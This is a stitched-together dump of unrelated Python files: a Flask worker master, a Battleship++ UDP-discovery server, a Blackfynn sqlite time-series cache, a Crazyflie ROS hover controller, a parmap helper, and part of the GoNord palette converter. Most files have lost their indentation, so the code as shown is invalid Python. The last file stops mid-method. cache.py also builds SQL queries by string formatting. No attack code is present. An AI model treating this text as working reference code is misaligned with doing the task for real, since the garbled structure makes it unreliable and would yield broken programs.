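        # expose a hook that other plugins could attach handlers to via connectHook
        self.newHook("exampleHook")
    def sayHello(self):
        return "hello from the example plugin"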
|
master.py
|
import atexit
import logging
import multiprocessing
import queue
from collections import defaultdict, deque
from functools import lru_cache
from multiprocessing import Process, Queue
from threading import Thread, RLock
from time import sleep, time
import flask
import psutil
import sentry_sdk
from main import simple_settings
from main.simple_settings import MONITOR
from main.workers.utils import internal_error_result, make_result
from main.workers.worker import worker_loop_in_thread
TESTING = False
log = logging.getLogger(__name__)
class UserProcess:
def __init__(self):
self.user_id = None
self.lock = RLock()
self.task_queue = None
self.input_queue = None
self.result_queue = None
self.awaiting_input = False
self.process = None
self.fresh_process = True
self.last_used = float('inf')
self.start_process()
atexit.register(self.cleanup)
def cleanup(self, *, in_background=False):
process = self.process
queues = [self.task_queue, self.input_queue, self.result_queue]
if process is None:
assert not any(queues), (process, queues)
return
def do():
if process:
process.terminate()
for q in queues:
if q:
q.close()
if in_background:
Thread(target=do).start()
else:
do()
def close(self):
atexit.unregister(self.cleanup)
self.cleanup(in_background=True)
@property
def ps(self):
return psutil.Process(self.process.pid)
def start_process(self):
self.cleanup(in_background=True)
self.fresh_process = True
self.awaiting_input = False
self.task_queue = Queue()
self.input_queue = Queue()
self.result_queue = Queue()
self.process = Process(
target=worker_loop_in_thread,
args=(self.task_queue, self.input_queue, self.result_queue),
daemon=True,
)
self.process.start()
def handle_entry(self, entry):
self.last_used = time()
if entry["source"] == "shell":
if self.awaiting_input:
self.input_queue.put(entry["input"])
else:
self.task_queue.put(entry)
else:
if not TESTING and self.awaiting_input:
self.start_process()
self.task_queue.put(entry)
def await_result(self):
result = self._await_result()
if result["error"] and result["error"]["sentry_event"]:
sentry_sdk.capture_event(result["error"]["sentry_event"])
self.awaiting_input = result["awaiting_input"]
return result
def _await_result(self):
# TODO cancel if result was cancelled by a newer handle_entry
result = None
while result is None:
if simple_settings.Root.SET_LIMITS:
timeout = 10 if self.fresh_process else 3
else:
timeout = None
try:
result = self.result_queue.get(timeout=timeout)
assert (result is None) == self.fresh_process
self.fresh_process = False
except queue.Empty:
self.start_process()
result = make_result(
output_parts=[
dict(color='red', text='The process died.\n'),
dict(color='red', text='Your code probably took too long.\n'),
dict(color='red', text='Maybe you have an infinite loop?\n'),
],
output='The process died.',
)
return result
user_processes = defaultdict(UserProcess)
app = flask.Flask(__name__)
try:
multiprocessing.set_start_method("spawn")
except RuntimeError:
# noinspection PyArgumentList
assert multiprocessing.get_start_method() == "spawn"
def monitor_processes():
history = deque([], MONITOR.NUM_MEASUREMENTS)
while True:
sleep(MONITOR.SLEEP_TIME)
percent = psutil.virtual_memory().percent
history.append(percent)
log.info(f"Recent memory usage: {history}")
log.info(f"Number of user processes: {len(user_processes)}")
if (
len(history) == history.maxlen
and min(history) > MONITOR.THRESHOLD
and len(user_processes) > MONITOR.MIN_PROCESSES
):
oldest = min(user_processes.values(), key=lambda p: p.last_used)
log.info(f"Terminating process last used {int(time() - oldest.last_used)} seconds ago")
del user_processes[oldest.user_id]
with oldest.lock:
oldest.close()
history.clear()
@lru_cache()
def start_monitor():
if MONITOR.ACTIVE:
Thread(
target=monitor_processes,
name=monitor_processes.__name__,
daemon=True,
).start()
@app.route("/run", methods=["POST"])
def run():
start_monitor()
try:
entry = flask.request.json
user_id = entry["user_id"]
user_process = user_processes[user_id]
user_process.user_id = user_id
with user_process.lock:
user_process.handle_entry(entry)
return user_process.await_result()
except Exception:
return internal_error_result()
@app.route("/health")
def health():
return "ok"
def run_server():
app.run(host="0.0.0.0")
@lru_cache()
def master_session():
import requests
session = requests.Session()
if not simple_settings.Root.SEPARATE_WORKER_PROCESS:
Thread(
target=run_server,
daemon=True,
name=run_server.__name__,
).start()
# Wait until alive
while True:
try:
session.get(simple_settings.Root.MASTER_URL + "health")
break
except requests.exceptions.ConnectionError:
sleep(1)
return session
def worker_result(entry):
session = master_session()
return session.post(simple_settings.Root.MASTER_URL + "run", json=entry).json()
if __name__ == '__main__':
run_server()
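# --- Illustrative sketch (separate from the module above) ------------------
# worker_result() forwards an "entry" dict to the master's /run endpoint and
# returns the JSON result.  From run()/handle_entry() above, an entry carries
# at least "user_id" and "source" ("shell" entries may also carry "input");
# any further fields depend on the worker and are not shown here, so the
# entry below is only a hypothetical example of the call shape.
def example_call():
    entry = {
        "user_id": 123,           # routes to (or creates) that user's process
        "source": "shell",
        "input": "1 + 1\n",       # only consumed if the process awaits input
    }
    return worker_result(entry)   # -> dict produced by make_result(...)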
|
main.py
|
#!/usr/bin/env python
#
# Author: Younis Bensalah <younis.bensalah@gmail.com>
#
import os
import sys
import logging
import threading
import argparse
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../common'))
from server import *
from socketserver import UDPServer, BaseRequestHandler
class UDPDiscoveryHandler(BaseRequestHandler):
def handle(self):
if self.request[0].decode("UTF-8") == "I_NEED_A_BATTLESHIP_PLUS_PLUS_SERVER":
socket = self.request[1]
socket.sendto("I_AM_A_BATTLESHIP_PLUS_PLUS_SERVER".encode("UTF-8"), self.client_address)
def main():
logging.basicConfig(format="%(asctime)s - SERVER - %(levelname)s - %(message)s", level=logging.DEBUG)
# parse host and port args
parser = argparse.ArgumentParser(description="battleship++ dedicated server")
parser.add_argument('host')
parser.add_argument('port', type=int)
args = parser.parse_args()
    # start UDP discovery service
udpdiscovery_server = UDPServer(("", 12345), UDPDiscoveryHandler)
udpdiscovery_server_thread = threading.Thread(target=udpdiscovery_server.serve_forever)
udpdiscovery_server_thread.daemon = True
udpdiscovery_server_thread.start()
logging.debug("UDP discovery server running in thread: " + udpdiscovery_server_thread.name)
server = TCPServer((args.host, args.port), RequestHandler)
logging.info("Listening on {}:{}".format(args.host, args.port))
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logging.debug("Server loop running in thread: " + server_thread.name)
# block until keyboard interrupt or system exit
try:
server_thread.join()
udpdiscovery_server_thread.join()
except (KeyboardInterrupt, SystemExit) as e:
logging.debug(repr(e))
# gracefully kill the server
logging.info("Server shutting down...")
server.shutdown()
server.server_close()
udpdiscovery_server.shutdown()
udpdiscovery_server.server_close()
logging.info("Bye!")
if __name__ == '__main__':
main()
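# --- Illustrative sketch (separate from the server above) ------------------
# UDPDiscoveryHandler answers the literal probe string with the literal reply
# string on UDP port 12345.  A minimal, hypothetical client-side probe (the
# broadcast address and timeout below are assumptions) could look like this:
import socket
def discover_server(timeout=2.0):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(timeout)
    sock.sendto(b"I_NEED_A_BATTLESHIP_PLUS_PLUS_SERVER", ("<broadcast>", 12345))
    try:
        data, addr = sock.recvfrom(1024)
        if data == b"I_AM_A_BATTLESHIP_PLUS_PLUS_SERVER":
            return addr[0]        # IP address of a responding server
        return None
    except socket.timeout:
        return None
    finally:
        sock.close()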
|
cache.py
|
from __future__ import absolute_import, division, print_function
from builtins import filter, object, zip
import io
import multiprocessing as mp
import os
import platform
import sqlite3
import time
from datetime import datetime
from glob import glob
from itertools import groupby
from blackfynn import log
from blackfynn.extensions import numpy as np
from blackfynn.extensions import pandas as pd
from blackfynn.extensions import require_extension
from blackfynn.models import DataPackage, TimeSeriesChannel
from blackfynn.utils import usecs_since_epoch, usecs_to_datetime
from .cache_segment_pb2 import CacheSegment
logger = log.get_logger("blackfynn.cache")
def filter_id(some_id):
return some_id.replace(":", "_").replace("-", "_")
def remove_old_pages(cache, mbdiff):
# taste the rainbow!
n = int(1.5 * ((mbdiff * 1024 * 1024) / 100) / cache.page_size) + 5
# 2. Delete some pages from cache
with cache.index_con as con:
logger.debug("Cache - removing {} pages...".format(n))
# find the oldest/least accessed pages
q = """
SELECT channel,page,access_count,last_access
FROM ts_pages
ORDER BY last_access ASC, access_count ASC
LIMIT {num_pages}
""".format(
num_pages=n
)
pages = con.execute(q).fetchall()
# remove the selected pages
pages_by_channel = groupby(pages, lambda x: x[0])
for channel, page_group in pages_by_channel:
_, pages, counts, times = list(zip(*page_group))
# remove page files
cache.remove_pages(channel, *pages)
with cache.index_con as con:
con.execute("VACUUM")
logger.debug("Cache - {} pages removed.".format(n))
return n
def compact_cache(cache, max_mb):
logger.debug("Inspecting cache...")
wait = 2
current_mb = cache.size / (1024.0 * 1024)
desired_mb = 0.9 * max_mb
while current_mb > desired_mb:
logger.debug(
"Cache - current: {:02f} MB, maximum: {} MB".format(current_mb, max_mb)
)
try:
remove_old_pages(cache, current_mb - desired_mb)
except sqlite3.OperationalError:
logger.debug(
"Cache - Index DB was locked, waiting {} seconds...".format(wait)
)
if wait >= 1024:
logger.error("Cache - Unable to compact cache!")
return # silently fail
time.sleep(wait)
wait = wait * 2
current_mb = cache.size / (1024.0 * 1024)
@require_extension
def create_segment(channel, series):
segment = CacheSegment()
segment.channelId = channel.id
segment.index = series.index.astype(np.int64).values.tobytes()
segment.data = series.values.tobytes()
return segment
@require_extension
def read_segment(channel, bytes):
segment = CacheSegment.FromString(bytes)
index = pd.to_datetime(np.frombuffer(segment.index, np.int64))
data = np.frombuffer(segment.data, np.double)
series = pd.Series(data=data, index=index, name=channel.name)
return series
class Cache(object):
def __init__(self, settings):
self._conn = None
self.dir = settings.cache_dir
self.index_loc = settings.cache_index
self.write_counter = 0
# this might be replaced with existing page size (from DB)
self.page_size = settings.ts_page_size
self.settings = settings
self.init_dir()
@property
def index_con(self):
if self._conn is None:
self._conn = sqlite3.connect(self.index_loc, timeout=60)
return self._conn
def init_dir(self):
if not os.path.exists(self.dir):
os.makedirs(self.dir)
os.chmod(self.dir, 0o775)
index_dir = os.path.dirname(self.index_loc)
if not os.path.exists(index_dir):
            os.makedirs(index_dir)
            os.chmod(index_dir, 0o775)
def init_tables(self):
with self.index_con as con:
self.init_index_table(con)
self.init_settings_table(con)
def init_index_table(self, con):
# check for index table
q = "SELECT name FROM sqlite_master WHERE type='table' AND name='ts_pages'"
r = con.execute(q)
if r.fetchone() is None:
logger.info("Cache - Creating 'ts_pages' table")
# create index table
q = """
CREATE TABLE ts_pages (
channel CHAR(50) NOT NULL,
page INTEGER NOT NULL,
access_count INTEGER NOT NULL,
last_access DATETIME NOT NULL,
has_data BOOLEAN,
PRIMARY KEY (channel, page))
"""
con.execute(q)
def init_settings_table(self, con):
# check for settings table
q = "SELECT name FROM sqlite_master WHERE type='table' AND name='settings'"
r = con.execute(q)
if r.fetchone() is None:
logger.info("Cache - Creating 'settings' table")
# create settings table
q = """
CREATE TABLE settings (
ts_page_size INTEGER NOT NULL,
ts_format CHAR(50) NOT NULL,
max_bytes INTEGER NOT NULL,
modified DATETIME)
"""
con.execute(q)
# insert settings values
q = """
INSERT INTO settings
VALUES ({page_size}, '{format}', {max_bytes},'{time}')
""".format(
page_size=self.page_size,
format="PROTOBUF",
max_bytes=self.settings.cache_max_size,
time=datetime.now().isoformat(),
)
con.execute(q)
else:
# settings table exists
# 1. check for ts_format field (not there indicating old cache)
result = con.execute("PRAGMA table_info('settings');").fetchall()
fields = list(zip(*result))[1]
if "ts_format" not in fields:
                # this means they used an older client to initialize the cache, and because
# we switched the serialization format, we'll need to refresh it.
logger.warn(
"Deprecated cache format detected - clearing & reinitializing cache..."
)
self.clear()
# 2. check page size
result = con.execute("SELECT ts_page_size FROM settings").fetchone()
if result is not None:
# page size entry exists
self.page_size = result[0]
if self.settings.ts_page_size != self.page_size:
logger.warn(
"Using existing page_size={} from DB settings (user specified page_size={})".format(
self.page_size, self.settings.ts_page_size
)
)
else:
# somehow, there is no page size entry
self.page_size = self.settings.ts_page_size
def set_page(self, channel, page, has_data):
with self.index_con as con:
q = "INSERT INTO ts_pages VALUES ('{channel}',{page},0,'{time}',{has_data})".format(
channel=channel.id,
page=page,
time=datetime.now().isoformat(),
has_data=int(has_data),
)
con.execute(q)
def set_page_data(self, channel, page, data, update=False):
has_data = False if data is None else len(data) > 0
if has_data:
# there is data, write it to file
filename = self.page_file(channel.id, page, make_dir=True)
segment = create_segment(channel=channel, series=data)
with io.open(filename, "wb") as f:
f.write(segment.SerializeToString())
self.page_written()
try:
if update:
# modifying an existing page entry
self.update_page(channel, page, has_data)
else:
# adding a new page entry
self.set_page(channel, page, has_data)
except sqlite3.OperationalError:
logger.warn("Indexing DB inaccessible, resetting connection.")
if self._conn is not None:
self._conn.close()
self._conn = None
except sqlite3.IntegrityError:
# page already exists - ignore
pass
def check_page(self, channel, page):
"""
Does page exist in cache?
"""
with self.index_con as con:
q = """ SELECT page
FROM ts_pages
WHERE channel='{channel}' AND page={page}
""".format(
channel=channel.id, page=page
)
r = con.execute(q).fetchone()
return r is not None
def page_has_data(self, channel, page):
with self.index_con as con:
q = """
SELECT has_data
FROM ts_pages
WHERE channel='{channel}' AND page={page}
""".format(
channel=channel.id, page=page
)
r = con.execute(q).fetchone()
return None if r is None else bool(r[0])
@require_extension
def get_page_data(self, channel, page):
has_data = self.page_has_data(channel, page)
if has_data is None:
# page not present in cache
return None
elif not has_data:
# page is empty
return pd.Series([], index=pd.core.index.DatetimeIndex([]))
# page has data, let's get it
filename = self.page_file(channel.id, page, make_dir=True)
if os.path.exists(filename):
# get page data from file
with io.open(filename, "rb") as f:
series = read_segment(channel, f.read())
# update access count
self.update_page(channel, page, has_data)
return series
else:
# page file has been deleted recently?
logger.warn("Page file not found: {}".format(filename))
return None
def update_page(self, channel, page, has_data=True):
with self.index_con as con:
q = """
UPDATE ts_pages
SET access_count = access_count + 1,
last_access = '{now}',
has_data = {has_data}
WHERE channel='{channel}' AND page='{page}'
""".format(
channel=channel.id,
page=page,
has_data=int(has_data),
now=datetime.now().isoformat(),
)
con.execute(q)
def page_written(self):
# cache compaction?
self.write_counter += 1
if self.write_counter > self.settings.cache_inspect_interval:
self.write_counter = 0
self.start_compaction()
def start_compaction(self, background=True):
if background:
# spawn cache compact job
p = mp.Process(
target=compact_cache, args=(self, self.settings.cache_max_size)
)
p.start()
else:
compact_cache(self, self.settings.cache_max_size)
def remove_pages(self, channel_id, *pages):
# remove page data files
for page in pages:
filename = self.page_file(channel_id, page)
if os.path.exists(filename):
os.remove(filename)
try:
os.removedirs(os.path.dirname(filename))
except os.error:
# directory not empty
pass
# remove page index entries
with self.index_con as con:
q = """
DELETE
FROM ts_pages
WHERE channel = '{channel}' AND page in ({pages})
""".format(
channel=channel_id, pages=",".join(str(p) for p in pages)
)
con.execute(q)
def page_file(self, channel_id, page, make_dir=False):
"""
Return the file corresponding to a timeseries page (stored as serialized protobuf).
"""
filedir = os.path.join(self.dir, filter_id(channel_id))
if make_dir and not os.path.exists(filedir):
os.makedirs(filedir)
filename = os.path.join(filedir, "page-{}.bin".format(page))
return filename
def clear(self):
import shutil
if self._conn is not None:
with self.index_con as con:
# remove page entries
con.execute("DELETE FROM ts_pages;")
con.commit()
self._conn.close()
self._conn = None
try:
# delete index file
os.remove(self.index_loc)
except:
logger.warn("Could not delete index file: {}".format(self.index_loc))
shutil.rmtree(self.dir, ignore_errors=True)
# reset
self.init_dir()
self.init_tables()
@property
def page_files(self):
return glob(os.path.join(self.dir, "*", "*.bin"))
@property
def size(self):
"""
Returns the size of the cache in bytes
"""
all_files = self.page_files + [self.index_loc]
return sum(os.stat(x).st_size for x in all_files)
def get_cache(settings, start_compaction=False, init=True):
cache = Cache(settings)
if start_compaction:
background = platform.system().lower() != "windows"
cache.start_compaction(background=background)
if init:
cache.init_tables()
return cache
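# --- Illustrative sketch (separate from the module above) ------------------
# get_cache() only needs a settings object exposing the attributes the Cache
# reads (cache_dir, cache_index, ts_page_size, cache_max_size,
# cache_inspect_interval).  In the library these come from the blackfynn
# settings; the namespace below is a made-up stand-in for illustration only.
from types import SimpleNamespace
example_settings = SimpleNamespace(
    cache_dir="/tmp/bf_cache",               # where page-*.bin files go
    cache_index="/tmp/bf_cache/index.db",    # sqlite index location
    ts_page_size=3600,                       # page size used for new caches
    cache_max_size=100 * 1024 * 1024,        # bytes before compaction kicks in
    cache_inspect_interval=100,              # writes between compaction checks
)
# cache = get_cache(example_settings, init=True)
# cache.page_file("N:channel:1234", 0) -> "/tmp/bf_cache/N_channel_1234/page-0.bin"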
|
Hover.py
|
#!/usr/bin/env python
import rospy
import tf
from crazyflie_driver.msg import Hover
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from threading import Thread
class Crazyflie:
def __init__(self, prefix):
self.prefix = prefix
worldFrame = rospy.get_param("~worldFrame", "/world")
self.rate = rospy.Rate(10)
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
self.update_params = rospy.ServiceProxy(prefix + '/update_params', UpdateParams)
self.setParam("kalman/resetEstimation", 1)
self.pub = rospy.Publisher(prefix + "/cmd_hover", Hover, queue_size=1)
self.msg = Hover()
self.msg.header.seq = 0
self.msg.header.stamp = rospy.Time.now()
self.msg.header.frame_id = worldFrame
self.msg.yawrate = 0
self.stop_pub = rospy.Publisher(prefix + "/cmd_stop", Empty, queue_size=1)
self.stop_msg = Empty()
# determine direction of speed based on distance
def getSpeed(self, distance):
if distance > 0:
return 0.1
elif distance < 0:
return -0.1
else:
return 0
def setParam(self, name, value):
rospy.set_param(self.prefix + "/" + name, value)
self.update_params([name])
# x, y is the x, y distance relative to itself
# z is absolute z distance
# TODO: solve 0
def goTo (self, x, y, zDistance, yaw):
duration = 0
duration_x = 0
duration_y = 0
duration_z = 0
vx = 0
vy = 0
z = self.msg.zDistance # the zDistance we have before
z_scale = self.getSpeed(z) # the z distance each time z has to increment, will be changed
# for x, in secs
if x != 0:
duration_x = abs(x/0.1)
vx = self.getSpeed(x)
# for y, in secs
if y != 0:
duration_y = abs(y/0.1)
vy = self.getSpeed(y)
duration_z = abs(z-zDistance)/0.1
durations = [duration_x, duration_y, duration_z]
duration = max(durations)
if duration == 0:
return
elif duration == duration_x:
# x is the longest path
vy *= abs(y/x)
z_scale *= abs((z-zDistance)/x)
elif duration == duration_y:
# y is the longest path
vx *= abs(x/y)
z_scale *= abs((z-zDistance)/y)
elif duration == duration_z:
# z is the longest path
vx *= abs(x/(z-zDistance))
vy *= abs(y/(z-zDistance))
print(vx)
print(vy)
print(z_scale)
print(duration)
start = rospy.get_time()
while not rospy.is_shutdown():
self.msg.vx = vx
self.msg.vy = vy
self.msg.yawrate = 0.0
self.msg.zDistance = z
if z < zDistance:
print(zDistance)
print(z)
z += z_scale
else:
z = zDistance
now = rospy.get_time()
if (now - start > duration):
break
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
rospy.loginfo("sending...")
rospy.loginfo(self.msg.vx)
rospy.loginfo(self.msg.vy)
rospy.loginfo(self.msg.yawrate)
rospy.loginfo(self.msg.zDistance)
self.pub.publish(self.msg)
self.rate.sleep()
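# Illustrative walk-through (not from the original author): with the 0.1 m/s speeds
# above, goTo(0.2, 0.2, 0.4, 0) starting from self.msg.zDistance == 0.3 gives
# duration_x = duration_y = 2.0 s and duration_z = 1.0 s, so x is the longest path
# (duration = 2.0 s); vy is scaled by |y/x| = 1.0 and z_scale by |(z - zDistance)/x| = 0.5,
# so the copter climbs in 0.05 m increments while moving at 0.1 m/s in x and y.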
# take off to z distance
def takeOff(self, zDistance):
time_range = 1 + int(10*zDistance/0.4)
while not rospy.is_shutdown():
for y in range(time_range):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = y / 25.0
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
self.rate.sleep()
for y in range(20):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
self.rate.sleep()
break
# land from last zDistance
def land (self):
# get last height
zDistance = self.msg.zDistance
while not rospy.is_shutdown():
while zDistance > 0:
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
self.rate.sleep()
zDistance -= 0.2
self.stop_pub.publish(self.stop_msg)
break
def handler(cf):
# cf.takeOff(0.4)
cf.goTo(0.2, 0.2, 0.4, 0)
cf.land()
if __name__ == '__main__':
rospy.init_node('hover', anonymous=True)
cf1 = Crazyflie("cf1")
# cf2 = Crazyflie("cf2")
t1 = Thread(target=handler, args=(cf1,))
# t2 = Thread(target=handler, args=(cf2,))
t1.start()
# t2.start()
|
parmap.py
|
from multiprocessing import Process, Pipe
import time
## from https://stackoverflow.com/questions/3288595/multiprocessing-how-to-use-pool-map-on-a-function-defined-in-a-class
def spawn(f):
def fun(pipe, x):
pipe.send(f(x))
pipe.close()
return fun
def parmap(f, X):
# b = time.time()
# print('parmap', b)
pipe = [Pipe() for x in X]
proc = [Process(target=spawn(f), args=(c, x)) for x, (p, c) in zip(X, pipe)]
# print('pipe created', time.time() - b)
[p.start() for p in proc]
# Receive before joining: a child blocks in send() if the pipe buffer fills up,
# so joining first can deadlock for large results.
results = [p.recv() for (p, c) in pipe]
[p.join() for p in proc]
return results
# if __name__ == '__main__':
# print(parmap(lambda x: x ** x, range(1, 5)))
|
GoNord.py
|
import base64
import os
from io import BytesIO
from math import ceil
import threading
from PIL import Image, ImageFilter
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 `importlib_resources`.
import importlib_resources as pkg_resources
from .palettes import Nord as nord_palette
from ImageGoNord.utility.quantize import quantize_to_palette
import ImageGoNord.utility.palette_loader as pl
from ImageGoNord.utility.ConvertUtility import ConvertUtility
class NordPaletteFile:
"""
A class used to map the nord color-scheme into files.
Each file contains the hex of colors
...
Attributes
----------
AURORA : str
Aurora color-palette
FROST : str
Frost color-palette
POLAR_NIGHT : str
Polar night color-palette
SNOW_STORM : str
Snow Storm color-palette
"""
AURORA = "Aurora.txt"
FROST = "Frost.txt"
POLAR_NIGHT = "PolarNight.txt"
SNOW_STORM = "SnowStorm.txt"
class GoNord(object):
"""
A class used for converting image to the nord palette
It can also convert images to other palettes by loading a different palette
This class needs Pillow and applies 3 different palette conversion algorithms:
- replace pixel by avg area pixel
- replace pixel by pixel
- apply a filter by using pillow features
Attributes
----------
PALETTE_LOOKUP_PATH : str
path to look for finding the palette files (.txt)
USE_GAUSSIAN_BLUR : bool
enable or disable the blur (in output)
USE_AVG_COLOR : bool
enable or disable avg algorithm
AVG_BOX_DATA : dict
params (width and height) of the avg area to be considered
AVAILABLE_PALETTE : list
loaded palette list
PALETTE_DATA : dict
available palette data in hex : rgb format
Methods
-------
set_palette_lookup_path(self, path)
Set the base_path for the palette folder
set_default_nord_palette(self)
Set available palette as the default palette
get_palette_data(self)
Build the palette data from configuration
add_color_to_palette(self, hex_color)
Add hex color to current palette
reset_palette(self)
Reset the available_palette prop
add_file_to_palette(self, file)
Append a custom file to the available palette
enable_gaussian_blur(self)
Enable blur filter
disable_gaussian_blur(self)
Disable blur filter
open_image(self, path)
Load an image using Pillow utility
resize_image(self, image, w=0, h=0)
Resize an image using Pillow utility
image_to_base64(self, image, extension)
Convert a Pillow image to base64 string
base64_to_image(self, img_b64)
Convert a base64 string to a Pillow image
load_pixel_image(self, opened_image)
Load the pixel map of a given Pillow image
enable_avg_algorithm(self)
Enable avg algorithm
disable_avg_algorithm(self)
Disable avg algorithm
set_avg_box_data(self, w=-2, h=2)
Set the dimension of the AVG area box to use
quantize_image(self, image, save_path='')
Quantize a Pillow image by applying the available palette
convert_image(self, image, palettedata, save_path='')
Process a Pillow image by replacing pixel or by avg algorithm
save_image_to_file(self, image, path)
Save a Pillow image to file
"""
DEFAULT_PALETTE_PATH = '../palettes/Nord/'
if (os.path.exists('../palettes/Nord/') == False):
pa = pkg_resources.open_text(nord_palette, NordPaletteFile.AURORA)
DEFAULT_PALETTE_PATH = os.path.dirname(nord_palette.__file__) + '/'
PALETTE_LOOKUP_PATH = DEFAULT_PALETTE_PATH
USE_GAUSSIAN_BLUR = False
USE_AVG_COLOR = False
AVG_BOX_DATA = {"w": -2, "h": 3}
TRANSPARENCY_TOLERANCE = 190
MAX_THREADS = 10
AVAILABLE_PALETTE = []
PALETTE_DATA = {}
def __init__(self):
"""Constructor: init variables & config"""
self.set_default_nord_palette()
self.set_avg_box_data()
def set_palette_lookup_path(self, path):
"""Set the base_path for the palette folder"""
self.PALETTE_LOOKUP_PATH = path
def set_default_nord_palette(self):
"""Set available palette as the default palette"""
self.AVAILABLE_PALETTE = [
NordPaletteFile.POLAR_NIGHT,
NordPaletteFile.SNOW_STORM,
NordPaletteFile.FROST,
NordPaletteFile.AURORA,
]
def get_palette_data(self):
"""
Build the palette data from configuration
Returns
-------
dict
The palette data: keys are hex color code, values are rgb values
"""
for palette_file in self.AVAILABLE_PALETTE:
hex_colors = pl.import_palette_from_file(
self.PALETTE_LOOKUP_PATH + palette_file)
for hex_color in hex_colors:
self.PALETTE_DATA[hex_color] = pl.export_tripletes_from_color(
hex_color)
# Delete empty lines, if they exist.
if '' in self.PALETTE_DATA and len(self.PALETTE_DATA['']) == 0:
del self.PALETTE_DATA['']
return self.PALETTE_DATA
def add_color_to_palette(self, hex_color):
self.PALETTE_DATA[hex_color[1:]] = pl.export_tripletes_from_color(hex_color[1:])
def reset_palette(self):
"""Reset available palette array"""
self.AVAILABLE_PALETTE = []
self.PALETTE_DATA = {}
def add_file_to_palette(self, file):
"""Method for adding file to the available palette"""
self.AVAILABLE_PALETTE.append(file)
self.get_palette_data()
def set_transparency_tolerance(self, tolerance):
"""Method for changing the alpha tolerance"""
self.TRANSPARENCY_TOLERANCE = int(tolerance)
def enable_gaussian_blur(self):
"""Enable gaussian blur on the output img"""
self.USE_GAUSSIAN_BLUR = True
def disable_gaussian_blur(self):
"""Disable gaussian blur on the output img"""
self.USE_GAUSSIAN_BLUR = False
def open_image(self, path):
"""
Load an image using Pillow utility
Parameters
----------
path : str
the path and the filename where to save the image
Returns
-------
pillow image
opened image
"""
opened_image = Image.open(path)
if (type(opened_image.getpixel((0,0))) == int):
opened_image = opened_image.convert('RGB')
return opened_image
def resize_image(self, image, size=(0, 0)):
"""
Resize an image using Pillow utility
Parameters
----------
image : pillow image
The source pillow image
:param size:
(width, height) of returning image, using half image size if not specified
Returns
-------
pillow image
resized image
"""
if len(size) == 2 and all(size):
return image.resize(size)
w, h = image.size
half_size = (round(w / 2), round(h / 2))
return image.resize(half_size)
def image_to_base64(self, image, extension):
"""
Convert a Pillow image to base64 string
Available extension: https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html
Parameters
----------
image : pillow image
The source pillow image
extension : str
The extension of the source image (mandatory)
Returns
-------
bytes
base64-encoded bytes of the image
"""
im_file = BytesIO()
image.save(im_file, format=extension)
im_bytes = im_file.getvalue()
return base64.b64encode(im_bytes)
def base64_to_image(self, img_b64):
"""
Convert a base64 string to a Pillow image
Parameters
----------
img_b64 : str
The base64 string representation of the image
Returns
-------
pillow image
The converted image from base64
"""
im_bytes = base64.b64decode(img_b64)
im_file = BytesIO(im_bytes)
return self.open_image(im_file)
def load_pixel_image(self, opened_image):
"""
Load the pixel map of a given Pillow image
Parameters
----------
image : pillow image
The source pillow image
Returns
-------
pillow image
pixel map of the opened image
"""
return opened_image.load()
def enable_avg_algorithm(self):
"""
Enable avg algorithm
"""
self.USE_AVG_COLOR = True
def disable_avg_algorithm(self):
"""
Disable avg algorithm
"""
self.USE_AVG_COLOR = False
def set_avg_box_data(self, w=-2, h=2):
"""
Set the dimension of the AVG area box to use
Parameters
----------
w : int
Box's width
h : int
Box's height
"""
self.AVG_BOX_DATA['w'] = w
self.AVG_BOX_DATA['h'] = h
def quantize_image(self, image, fill_color='2E3440', save_path=''):
"""
Quantize a Pillow image by applying the available palette
Parameters
----------
image : pillow image
The source pillow image
fill_color: str
Default fill color as foreground
save_path : str, optional
the path and the filename where to save the image
Returns
-------
pillow image
quantized image
"""
data_colors = pl.create_data_colors(self.get_palette_data())
while len(data_colors) < 768:
data_colors.extend(pl.export_tripletes_from_color(fill_color))
palimage = Image.new('P', (1, 1))
palimage.putpalette(data_colors)
quantize_img = quantize_to_palette(image, palimage)
if (save_path != ''):
self.save_image_to_file(quantize_img, save_path)
return quantize_img
def converted_loop(self, is_rgba, pixels, original_pixels, maxRow, maxCol, minRow=0, minCol=0):
color_checked = {}
for row in range(minRow, maxRow, 1):
for col in range(minCol, maxCol, 1):
try:
color_to_check = pixels[row, col]
except Exception:
continue
if (is_rgba):
if (color_to_check[3] < self.TRANSPARENCY_TOLERANCE):
continue
if self.USE_AVG_COLOR == True:
# todo: improve this feature in performance
color_to_check = ConvertUtility.get_avg_color(
pixels=original_pixels, row=row, col=col, w=self.AVG_BOX_DATA['w'], h=self.AVG_BOX_DATA['h'])
# saving in memory every checked color to improve performance
key_color_checked = ','.join(str(e) for e in list(color_to_check))
if (key_color_checked in color_checked):
difference = color_checked[key_color_checked]
else:
differences = [[ConvertUtility.color_difference(color_to_check, target_value), target_name]
for target_name, target_value in self.PALETTE_DATA.items()]
differences.sort()
difference = differences[0][1]
color_checked[key_color_checked] = difference
colors_list = self.PALETTE_DATA[difference]
if (is_rgba and len(colors_list) == 3):
colors_list.append(color_to_check[3])
pixels[row, col] = tuple(colors_list)
return pixels
def convert_image(self, image, save_path='', parallel_threading=False):
"""
Process a Pillow image by replacing pixel or by avg algorithm
Parameters
----------
image : pillow image
The source pillow image
save_path : str, optional
the path and the filename where to save the image
parallel_threading : bool, optional
whether to split the conversion across up to MAX_THREADS threads
Returns
-------
pillow image
processed image
"""
self.get_palette_data()
original_image = image.copy()
original_pixels = self.load_pixel_image(original_image)
original_image.close()
